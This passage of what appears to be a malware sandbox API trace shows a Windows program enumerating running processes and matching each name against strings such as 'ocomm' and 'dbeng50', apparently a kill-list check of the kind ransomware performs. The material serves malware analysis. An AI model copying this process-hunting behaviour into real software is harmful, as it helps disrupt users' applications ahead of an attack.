cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.878] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573d70 [0095.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3573d70, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0095.878] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0095.878] StrStrIA (lpFirst="ripe.exe", lpSrch="ocomm") returned 0x0 [0095.878] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0095.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.879] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573ea8 [0095.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3573ea8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0095.879] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0095.879] StrStrIA (lpFirst="acoustic.exe", lpSrch="ocomm") returned 0x0 [0095.879] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0095.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.881] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573ce0 [0095.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3573ce0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0095.881] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0095.881] StrStrIA (lpFirst="mail.exe", lpSrch="ocomm") returned 0x0 [0095.881] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.882] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573da0 [0095.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3573da0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.882] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.882] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocomm") returned 0x0 [0095.882] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.884] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573db8 [0095.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573db8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.884] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.884] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.884] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0095.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.885] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573dd0 [0095.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573dd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.885] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0095.886] StrStrIA (lpFirst="dllhost.exe", lpSrch="ocomm") returned 0x0 [0095.886] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.888] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573e30 [0095.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3573e30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.888] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.888] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocomm") returned 0x0 [0095.888] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0095.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.889] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573e48 [0095.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3573e48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0095.889] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0095.890] StrStrIA (lpFirst="UsoClient.exe", lpSrch="ocomm") returned 0x0 [0095.890] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.891] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573de8 [0095.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3573de8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.891] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.891] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocomm") returned 0x0 [0095.891] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0095.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0095.892] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3575ba0 [0095.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3575ba0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0095.892] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0095.892] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="ocomm") returned 0x0 [0095.892] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0095.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.898] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575940 [0095.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3575940, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0095.898] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0095.898] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="ocomm") returned 0x0 [0095.898] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0095.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.902] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ad80 [0095.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356ad80, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0095.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0095.902] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="ocomm") returned 0x0 [0095.902] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.903] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573e78 [0095.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.903] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.904] StrStrIA (lpFirst="conhost.exe", lpSrch="ocomm") returned 0x0 [0095.904] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.905] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573e60 [0095.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573e60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.905] StrStrIA (lpFirst="conhost.exe", lpSrch="ocomm") returned 0x0 [0095.905] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0095.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.906] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573e00 [0095.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3573e00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0095.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0095.906] StrStrIA (lpFirst="rxodge.exe", lpSrch="ocomm") returned 0x0 [0095.906] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0095.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.907] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573e90 [0095.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3573e90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0095.907] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0095.907] StrStrIA (lpFirst="sppsvc.exe", lpSrch="ocomm") returned 0x0 [0095.907] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0095.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.908] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575c60 [0095.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3575c60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0095.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0095.908] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="ocomm") returned 0x0 [0095.908] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0095.908] CloseHandle (hObject=0x358) returned 1 [0095.909] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0095.924] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.925] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575be0 [0095.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3575be0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0095.925] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0095.925] StrStrIA (lpFirst="[System Process]", lpSrch="dbeng50") returned 0x0 [0095.925] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0095.927] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574d60 [0095.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574d60, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0095.927] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0095.927] StrStrIA (lpFirst="System", lpSrch="dbeng50") returned 0x0 [0095.927] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.928] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573fc8 [0095.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3573fc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0095.928] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0095.928] StrStrIA (lpFirst="smss.exe", lpSrch="dbeng50") returned 0x0 [0095.928] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.930] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35740d0 [0095.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35740d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.930] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.930] StrStrIA (lpFirst="csrss.exe", lpSrch="dbeng50") returned 0x0 [0095.930] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.931] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3574010 [0095.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3574010, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0095.931] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0095.931] StrStrIA (lpFirst="wininit.exe", lpSrch="dbeng50") returned 0x0 [0095.931] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.932] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35740e8 [0095.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35740e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.932] lstrcpyA (in: lpString1=0x567fabc, 